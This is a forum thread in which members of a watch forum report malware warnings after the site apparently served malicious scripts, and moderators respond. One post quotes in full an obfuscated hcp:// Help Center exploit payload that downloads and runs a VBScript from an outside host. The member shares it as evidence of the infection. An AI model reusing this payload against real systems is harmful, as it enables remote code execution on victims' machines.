Is it just me or there is an attack on the forums

[figbo]

Droid,TRF and Jameson on the rocks,niiiceeee!!!

[77T]

Tapatalk and Lagavulin neat


Sent from my iPad using Tapatalk

[Dan Pierce]

Youve got the right idea, Raf!
Using my DROID but have to work overnight. :-(
dP

[therolexguy]

I'm getting "Web Attack: Blackhole Toolkit Websit 5" from Norton.

[77T]

Throughout the day it seems to be doing insertion attempts hopping from exploit to exploit.

Does any TRF'er do pen testing? It could help resolve the root kit running in background.


Sent from my iPad using Tapatalk

[sherwin]

same on firefox. cant verify on mac (overseas atm!)

[Trev]

Quote:

Originally Posted by dalip

...
TRF does not have any known malware or viruses at this point..

Since it is happening on some main computers, but not on another in the same house, the indication is that your computer has accepted a cookie form outside TRF. "

Hi dalip.

Respectfully, this is simply not true. TRF has been exploited and at least partially taken control of by someone with malicious intent. It's easy enough to prove.

I'm not a server admin or programmer, but have been building websites for over 15 years. I deal with servers and their software on a daily basis, including vBulletin and Xenforo.

I fired up a fresh (never before used) virtual machine. Accessing TRF spawns multiple requests to external servers attempting to run malicious Java software. These rogue Java applets could contain anything (key loggers, etc).

TRF members on certain OS/software setups would definitely be at risk here. I don't want to see anything bad happen to TRF members, especially with such a large-scale attack. There's huge potential for damage and loses.

I hope there's a quick fix for this. Perhaps reverting to a backup which is known to be safe and going from there? Either way, good luck to the team.

[BNA/LION]

Getting messages to approve strange sites to access my computer too.

Do you want to allow this website to open a program on your computer?
From: oreinoeksony.com
Program: Microsoft Support Help Center
Address: hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,111,1 14,101,105,110,111,101,107,115,111,110,121,46,99,1 11,109,47,99,111,110,116,101,110,116,47,104,99,112 ,95,118,98,115,46,112,104,112,63,102,61,50,54,38,1 00,61,49,34,44,102,97,108,115,101,58,46,115,101,11 0,100,40,41,58,83,101,116,32,65,32,61,32,67,114,10 1,97,116,101,79,98,106,101,99,116,40,34,83,99,114, 105,112,116,105,110,103,46,70,105,108,101,83,121,1 15,116,101,109,79,98,106,101,99,116,34,41,58,83,10 1,116,32,68,61,65,46,67,114,101,97,116,101,84,101, 120,116,70,105,108,101,40,65,46,71,101,116,83,112, 101,99,105,97,108,70,111,108,100,101,114,40,50,41, 32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,1 05,116,101,76,105,110,101,32,46,114,101,115,112,11 1,110,115,101,84,101,120,116,58,69,110,100,32,87,1 05,116,104,58,68,46,67,108,111,115,101,58,67,114,1 01,97,116,101,79,98,106,101,99,116,40,34,87,83,99, 114,105,112,116,46,83,104,101,108,108,34,41,46,82, 117,110,32,65,46,71,101,116,83,112,101,99,105,97,1 08,70,111,108,100,101,114,40,50,41,32,43,32,34,92, 34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,10 8,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,9 2,108,46,118,98,115,32,38,38,32,116,97,115,107,107 ,105,108,108,32,47,70,32,47,73,77,32,104,101,108,1 12,99,116,114,46,101,120,101)));</script>
Hope this info helps...

[dalip]

Quote:

Originally Posted by Trev

Hi dalip.

Respectfully, this is simply not true. TRF has been exploited and at least partially taken control of by someone with malicious intent. It's easy enough to prove.

I'm not a server admin or programmer, but have been building websites for over 15 years. I deal with servers and their software on a daily basis, including vBulletin and Xenforo.

I fired up a fresh (never before used) virtual machine. Accessing TRF spawns multiple requests to external servers attempting to run malicious Java software. These rogue Java applets could contain anything (key loggers, etc).

TRF members on certain OS/software setups would definitely be at risk here. I don't want to see anything bad happen to TRF members, especially with such a large-scale attack. There's huge potential for damage and loses.

I hope there's a quick fix for this. Perhaps reverting to a backup which is known to be safe and going from there? Either way, good luck to the team.

No disrespect taken Trev. It was information that I was passing on and had seemed to work for some others.

Obviously members who are worried and are affected should log off if that's how they feel.

Myself and many others are not currently affected.

This problem is being taken very seriously by the Administration team and their associated experts and they are doing all they can to identify the cause and get it rectified

[Bmonroy17]

Yeah my IT people ran over to my pc at work all freaked out . I got hit with whatever was on TRF

[rangoon]

I try to use firefox and google to view this site ytd but it stop me saying that there are malware, kinda javascript, if I say continue this is a normal site, it crash my browers. It ok if I use my Blackberry to view the site.

Any one has this problem too?

[77T]

Quote:

Originally Posted by dalip

No disrespect taken Trev. It was information that I was passing on and had seemed to work for some others.

Obviously members who are worried and are affected should log off if that's how they feel.

Myself and many others are not currently affected.

This problem is being taken very seriously by the Administration team and their associated experts and they are doing all they can to identify the cause and get it rectified

We all appreciate the work the sys admins are doing to solve this. Kudo's to them for the hard work. These situations are most difficult. In fact, our local hospital just announced they had to shut down admission to all but ER intake because of malware disabling their servers and entire countywide computer network.

I would say this to anyone who believes that they are not currently affected (because they are not seeing an alert):
You may still be in danger since the jar loader was simply not detected.


Sent from my iPad using Tapatalk

[Lol-x]

Please be patient guys we are working on getting this resolved asap.

I hope the solution will be obtained shortly.

Please accept my apologies.

I do not have any evidence of compromised accounts or computers at this stage, it may be a false positive, but it is best to err on the side of caution.

[316lad]

Quote:

Originally Posted by dalip

Again....not helpful. I'd suggest you calm down and think before you publicly criticize this forum as you

have here. If there's "so much wrong with it" then the answer for you is pretty simple.

The "someone wake up " comment is way out of line.

It is being worked on.

Sorry chaps, my comments were out of order and written whilst blundering about after a few beers last night and I apologise for them. There must be a hell of a lot of action going on behind the scenes to sort this out.
I certainly didn't mean to publicly criticise the forum - I meant that it's just crazy that every page throws up the warnings - sometimes even just scrolling a page will get the warning screens - as posted.
My 'wake up' was just plain rude and I apologise for that too.

Here's the strange thing though - been getting these warnings screens for 24 hours now and they appear to be completely benign.
I wonder if it's just that google logged a hijack attempt (which failed anyway) and now the site has been labelled as such - I think google label a site for a minimum of 90 days.
So we're not dealing with any malware here just seeing the warning screen that an attempt was made.
Either way, I'm sure you guys are on it and that stupid comments such as those I made last night are of no benefit whatsoever. Again, my apologies to all concerned.

[Lion]

I'm not to computer savy but why can I get on TRF through my iPad without a warning but on my Mac I do get the warning???

[Lol-x]

Google yesterday flagged this site for malware.

There was a malware issue associated with Tapatalk and this was bringing us down.

Google can take a couple of days to lift the 'caution' from your browser.

However things should now be back to normal.

[The Joker]

Well done Steve for sorting this. Just let us know who's responsible and we'll go round and sort em out.

And heres to James(316lad) who's gonna get a breathalyzer fitted to his computer.

[STEELINOX]

Quote:

Originally Posted by Lol-x

Google yesterday flagged this site for malware.

There was a malware issue associated with Tapatalk and this was bringing us down.

Google can take a couple of days to lift the 'caution' from your browser.

However things should now be back to normal.